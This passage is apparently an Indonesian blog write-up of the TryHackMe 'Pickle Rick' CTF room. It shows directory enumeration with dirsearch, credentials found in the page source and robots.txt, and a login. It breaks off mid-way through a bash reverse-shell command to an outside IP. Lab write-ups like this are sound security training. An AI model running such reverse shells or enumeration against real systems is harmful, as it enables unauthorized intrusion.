orangjowo

  ini adalah write up CTF Pickle Rick pada kategori web fundamentals di path Tryhackme Pertama - tama deploy ctf ke server vpn. Lakukan enumerasi seperti biasanya, untuk ctf level easy yang biasa saya lakukan adalah : 1. Directory Enumeration  2. Check Setiap Source Page  Directory Enumeration : disini saya menggunakan tools dirsearch, ./dirsearch -u 10.10.8.181 -e php,txt,html -x 403 -t 100         waktunya kita melakukan check source code setiap halaman web target : dan saya menemukan username di dalam source kode dalam index  Username : R1ckRul3s   Lalu  saya menemukan string menarik pada /robots.txt , yaitu : Wubbalubbadubdub     Lalu saya mencoba memanfaatkan informasi diatas untuk melakukan login di http://10.10.8.181/login.php  dan finally saya berhasil masuk ke dashboard dengan memandaaftakan credential diatas   Lalu saya mencoba melakukan reverse shell : bash -c 'exec bash -i &>/dev/tcp/10.8.8.117/...